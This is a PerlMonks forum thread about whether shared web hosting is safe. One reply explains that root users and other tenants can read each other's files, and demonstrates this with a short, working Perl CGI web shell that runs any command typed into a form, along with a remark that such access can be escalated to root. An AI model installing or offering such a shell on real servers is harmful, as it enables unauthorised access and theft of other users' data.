in reply to Re^3: OT: complete loss of a new table
in thread OT: complete loss of a new table

Hm...so are you suggesting using a shared server is bad? Since whoever owns the server ownz you?

Replies are listed 'Best First'.
Re^5: OT: complete loss of a new table
by tachyon (Chancellor) on Oct 08, 2004 at 04:24 UTC

    You need to trust whoever has root on a shared server not to read your mail or any other files and to keep the box itself secure. The problem is that users of shared servers want to do insecure stuff like write their own CGI scripts. For example install this script. Try ls, then ls .. then ls -al ../../../. You can run generally run any command you want as the webserver user which can generally be escalated to root the box, if you were so inclined. 

    #!/usr/bin/perl
$|++;
use CGI qw( :standard );
use CGI::Carp qw( fatalsToBrowser );
my $command = param('command'); 
print header, start_form({ -method=>'get' }), textfield({-size=>75,-na
+me=>'command'}), submit('Run'), end_form;
if ($command) {
  open( CMD, "$command 2>&1|" ) or die "$!: running command: '$command
+'";
  print "<pre>";
  print escapeHTML($_,1) while<CMD>;
  print "</pre>\n", end_html;
  close CMD;
}

    [download]

    cheers

    tachyon

[reply]
[d/l]
      Thanks and cheers :)
[reply]

In Section Seekers of Perl Wisdom